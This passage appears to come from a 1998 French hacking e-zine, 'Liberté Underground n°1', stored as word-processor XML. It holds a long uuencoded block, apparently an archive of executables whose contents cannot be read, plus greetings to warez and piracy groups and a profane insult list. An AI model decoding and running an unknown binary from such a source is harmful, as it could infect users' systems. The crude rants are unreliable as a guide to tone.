U+?VBKUVS,AY"5MRBIA77$=.&l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15MQ;(N)+0T:7_3.P"?"$X,&gt;;93`33UD1Z"U;VP&lt;=0:]W;Y0=#A"Q=KI</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7_;9$M72F[NEUQ3(PK1&amp;TAVX];!&lt;22$)X)&gt;3V&lt;\,3;:Q&amp;M2LS+0EHKZ0OU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RY"K?805(PP]'/,G@GQGZQC6&gt;N,3WCZ!0(/ACIYN&lt;MPS2&lt;GMKIB?$=NFZ$A(</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B@ZG6H::NQ2V0Q@?Q#UCGF"XCQB=2,0U;U.@-=F+^D&gt;FI)#"#J5&lt;`\TMXJ2_</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T9'*)\\W#31JXT%&gt;I#@'4UT]W6$/03)X\Y@O"TZ,"G*PY%8J)VB4_VL3VE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6&amp;FNLB^H*&gt;'#\0GB.Z.UM$F+THDQ\&lt;&amp;A;#+W]Z?FNIJ441II#G6-LS(%!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amp;O`E1P44&amp;.?#?8G6)MQ-$O&amp;.SMX&gt;;&lt;(;8J6VV("/EE.344IQ=0U-C33[(^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_=$G.\=]XYV8'*L-9D(-PT&amp;`YX^0AR&gt;="GM3/-4K-\_(H=\D8$HQ;9(0Z-:</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H?H2/"#0301]_3U!H3N)B_N'*&lt;&amp;AFB_;U(&lt;CD;D&amp;-LLM74IJ2D7T]_MZ0P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FCK&amp;-2'&gt;%T:C07ZBE23&amp;!GM'VB/-+-.?ZO*W3"G#U*3+)\&lt;&amp;0D-MK6B0[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CT3X5%OO%L8[\/)1(\6C$HMU/!06\S'T@-RUTA_B)E2VL6("\&gt;U\:8D&amp;41]</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FXBW#K1.SK6V1'P"/Y)&gt;J0KXE*8X&gt;;V*5^T31P:D*542V@L[.DE.Y-"?)1H</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37AQ7["[9[")1Q-L?W/4UQ*2A[HH:8#QNU*1]JG)&amp;"WV&gt;%$P.=@Y$&gt;Y.X`Y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H#6CD&gt;+QON(WR,[0X%?&amp;-3+8/L:%8BS30KS2G`D1&lt;Z-0&amp;^[RM'6--B9[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Q[DKWAT2[7"#O4G!IH8:+]4F185.C)]C:9BGG'&gt;\C1UNY.WA.,"[UA+8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lt;1&amp;&amp;RG8U/]XDB7:U*),&amp;T#E#\TY&amp;MA4U']W4\SH`7@`_@!*P"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V@#M``6@&amp;K&gt;;,*`#T`F(`+KTOR,`O`W0#&gt;@!]`+Z`/V``?V)&amp;O!VP"`@#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DH`AP#!@!'`)8!0P!A@'3``F`5/&amp;7S:LM/W]@GX/I(Q;"@-@`9QQ9^$!`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3G]U_\20`:X]9L.P`MXLWOS5NO9+ZHOOZK_EU=_%O[)&amp;XU(`[*`O-&amp;4-"`+</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R!L-2@.R@+S1K#0@"\@;C4L#LH"\T&lt;0T(`O(&amp;PU-`[*`O-'&lt;-"`+R!N-3@.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S1]#0@"\@;"Y`&amp;9`'Z7S?HG[2&gt;/R!O%)8&amp;9`%YH\@T(`O(DQ&gt;?TYN1!F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Q:?K-[\U;K6&gt;_J+[\JOY?7OTT,A^AS;'M&lt;=S^M&lt;%FHXU'&gt;M,/53EWSMFU</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KV.1HYOW*@,BVZ(C&lt;KKI/KS)-VS#LY^H&amp;PR1*V=`C#13\:')U;^@9CC`M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PT"G;"TJ8-C0*'L*52X6&lt;=BW93W\JAE)^9!V%;#EM&lt;1_Z&amp;1JDEA+$TNB[\</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KQFG&amp;DQIMA73]#ES;'(L&gt;ZF+FFT%3+MFZ[JA6=(R?(I^1DR;7VGGV&amp;*76F;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IY7MHE).II[1)KO=U#)J,34TTOR&amp;B&amp;WCZG;K=8)IPR6N\Y4!+G',.6O&gt;[F=_</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8"KY&amp;!R[/%PE=RP0\&gt;N46ZWYV'+V5B:`HJ/.DX[*LRATM$:FUQK;/E4^I;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WJ&lt;&lt;OME9HFK[1-'+;RN&amp;7VRF[A*EW$92]=&lt;-5=46TU+%]G]^V^E;L/5^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t;UY.;5RV&gt;U"575O+KK?!65FQ-?97;!IIM:LXMG.1P;?FK4AT:&lt;[200X?NYY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H]G&lt;9$M!U2FZ\S=GK\S1^2(:&gt;M^Y5ZQ[S]K_]3::ZAL7SGWK*?L&amp;O(X]G&amp;Y</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GG._.GGE&gt;=B/Y=&lt;%7277RNO%0QK$PMME&amp;YDT;*ATM&amp;Q.GM4LBV\%,L?E/+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lt;Y8MEM]M4V\Z*KY$W;N.4\5/'$HU\;Q;%^Q,;/''.,RSBHC%--P^(X&gt;9:F</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6^W(&lt;=]P!D3.7CVW.QY.'6K\SR$]8I51^$9`WL(HO3JUOC.B(O0N83Q"K8P</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MCU&lt;_,5;5$+89L=%WTM?5/;T#+TD'VN%,.6CYFGK3V$[15T*1]LO2XF2EI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0.,.P"&amp;8ZEAMCLBMOV$Q,8YKF$O']L7$%6QEVN8',&lt;/(]-NXV/;TX2#7Y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K=5X[WYOVO[`'PV1^]:TX5Z'1^$5O_DNNF9.P=NT.Y,Q.[6KEQ]DW;UI5&gt;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OE;3/KA9NWK3QG4;/[Q&gt;Z[ZL)SXV-B()JS?,3L]HFV_?-*.M7??1Z7%-B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2NO_%Z=//,]+K9Z5MBFG;-;&gt;MNGM;6SVKK-V@;=?5-VBWK9Z9OGKU]9K,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1'X#/-XG"==.?VC]QMF9=;/K;]]PZ_3FJ7XA4M^O-G\.4$L!`A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I*)&amp;Q/[8;(&amp;```O!D```P````````````@`/^!`````$-U=&amp;-R:S(P+F5X</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95!+`0(4`!0``@`(`/NR&gt;2&amp;1/(C3^@\``&amp;$U```,````````````(`#_@?(8</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D``!397)V=6ME&gt;2YE&gt;&amp;502P4&amp;``````(``@!T````%B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nd</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um -r/size 32891/10656</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler" w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>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10 ) Abonnement :</w:t>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Pour vous abonner, il suffit de m’envoyer un e-mail me disant que vous voulez vous abonne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n choisissant de recevoir l’ E-zine par E-mail ou par ICQ.</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i vous vous abonnez, n’oubliez pas de diffuser le zine le plus possible ! ;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11 ) Remerciements, Salut &amp; FUCK ! :</w:t>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REMERCIEMENTS ET SALUT :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>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tout ceux qui on participé directement ou indirectement à ce numér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a CoD4, NeurAlien, Sorc3Ry,... pour leurs merveileux E-Zi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Village pour l’hebergement de ma pag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Patty de m’avoir fait découvrir IRC, quand je n’étais qu’un Newbie en Internet, et merci de m’avoir fait découvrir L.S.M.</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Stormcore, Madball, KickBack, Mass Murderers, One Way System, Criminal A.D., LSM, Les Berrus, Sepultura, Otaku, Miossec, Les Wampas, MASS HYSTERIA, Spicy Box, Prodigy, Pills, Melmore, Noir Des, les Gunners, Miossec, Louise Attaque, Terminal Buzz Bomb,....et plein d’autre pour leur musique qui me fait triper.</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au grand BOB si il M’entend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CANAL B, La meilleure radio du mond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Edika, Maester, et à tous ceux de fluide Glacial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aux Editions du Lézard pour éditer des bouquins différents des autres, merci Surtout pour « fumée clandestine » I et II et « Les très riches heures du cannabis » de JP Galland, pour « Chaos et CyberCulture » , « L.S.D. mon terrible enfant » d’ Hoffman, et pour « Du Chocoalt à la Morphin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PC-TEAM, le meilleur magazine PC du commerc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Merci à INSAT</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J.P. Galland pour ses Bouquins démentiels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au C.I.RC.</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S.C.A.L.P. et à NO PASARAN, à L’alternative Libertair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tous les keupons ! Salut à tous les HACKERS, PHREAKER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tous ceux que je connais sur irc : Patty, Chriss, Pat, Moosh, Mat, Manifeste, [RoD01], Atlantik, Le_Che, Jabadao, et tous les autr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Piracy.fr, à MJ13, aux Lords Of chaos, à Piratel Production (qui nous ont quitté récemment),et à tous les groupe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JO.LEM. Salut à BOUDOU et bravo Pour son Webring Underground Francopho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Joran, à Larry, à Yass, à Xav, à Severine, à Morgane, à Aymeric, à Vincent, à Sylvain, Salut a Benoit, à Elisa, à Gwelt, à Nina, à Margot, à Pierrick, à Guillaume, aux Jumeaux, ......... et aux autres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aux channels #cendrillon, #rennes, #oinjland, #douze, #warez-France,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et solidarité à tous les SDF, les sans papiers, les zonnards,...</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alut à vous qui lisez ce Thanks, et à tous ceux que j’ai oublié !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>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Normal"/>
        <w:widowControl w:val="false"/>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b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GROS FUCK :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">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BIG FUCK à lepen et son F-haine, à la D.S.T., à la police Nationale, à TF1, au systeme Americain,</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à Billou et son Microsoft, à Windaube95, à France Telecom, à Aol (ces putains d’arnaqueurs !), au channel #sexe, ce channel de gros beaufs ! Fuck à tous les Nazis et Fachos, Fuck à Jean Paul II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uck à tous les connards lamers, fuck à tous les groupes de merdes qui ont étés créés que pour le fric et par casting (Alliage, Blur, Oasis, Spice girls, aqua, et autres Boys Band à la con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uck le showbizz français de merde ! (Obispo, Pagny, bruel, Docgyneco, et tous les autres, il y’en a trop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Fuck au systeme éducatif français, Fuck à la morale française de merde ! FUCK CHIRAC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Et j’en oublie !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entury Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>BoBmArLeY</w:t>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler" w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Conclusion :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>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Ca y’est, le premier numéro de « Liberté Underground » est déjà terminé, il m’a fallu un peu moins d’une semai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Je pense que pour un numéro 1 c’est pas trop trop mal, mais c’est pas le must. Je compte sur vous pour les prochains numéros, j’ai déjà pleins de projets d’articles en ce qui me concerne.</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Je vous le répete, vous etes invités à distribuer ce mag a un max de personnes !</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Si vous voulez repiquer mes articles, vous le pouvez, mais donnez à chaque fois mon Pseudo et dites que ça provient de ce mag.</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J’espère que ça vous a plu ! N’ hésitez pas à m’e-mailer même si c’est pas pour un abnmt ou une inscription, je reponds à tout le monde ! :o)</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rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t>A BIENTOT !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Haettenschweiler" w:hAnsi="Haettenschweiler" w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler" w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
        </w:rPr>
        <w:t>Liberté UnDeRgRoUnD n°1   Avril / mai 1998   ©G.L.U.F. &amp; BoBmArL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sectPr>
      <w:footerReference w:type="default" r:id="rId2"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="851" w:right="851" w:gutter="51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Haettenschweiler">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>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7:07:00Z</dcterms:created>
  <dc:creator>AureL</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>BoBmArLeY</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">1998-07-06T17:07:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>Liberté</dc:title>
</cp:coreProperties>
</file>